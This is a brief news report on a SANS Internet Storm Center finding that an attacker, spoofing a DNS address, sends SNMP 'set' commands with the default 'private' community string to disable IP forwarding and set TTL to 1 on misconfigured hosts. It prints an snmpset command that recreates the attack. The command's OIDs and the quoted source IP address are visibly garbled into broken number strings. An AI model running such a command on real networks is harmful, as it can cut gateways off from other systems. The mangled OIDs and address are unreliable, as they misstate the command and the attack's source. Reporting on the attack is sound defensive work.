Attackers tapping on SNMP door to see if it's open
SANS spots new, dumb attack
Google's DNS IP address is being spoofed by an attacker, apparently in an attempt to DDoS hosts vulnerable to a flaw in the SNMP protocol.
The SANS Internet Storm Center noticed the traffic trend emerging on September 15, and in this post discusses what's going on.
The attack is trying to take over SNMP hosts that have left default passwords in place – the default read/write community string “private” – and either comes from a troll, SANS says, or someone genuinely tapping on the door of target systems.
What's going on is outlined in this post. The attacker is trying to send an SNMP “set” command with the community string, something which on a badly-configured system would: “set the default TTL to 1, which would make it impossible for the gateway to connect to other systems that are not on the same link-layer network”, and “turn off IP forwarding”.
The SANS post says the traffic can be recreated using the command:
snmpset -v 1 -c private [target ip] .22.214.171.124.126.96.36.199.0 int 1 .188.8.131.52.184.108.40.206.0 int 2
Anybody seeing traffic that claims to be from 220.127.116.11 using incoming port 161 could see if they've been tapped by the attacker and let SANS know.
A couple of respondents to the SANS post said the attack seems to be methodical and working to a pretty straightforward pattern: “one hit on a single IP every 20 minutes, working thru our class C in sequence”, one stated. ®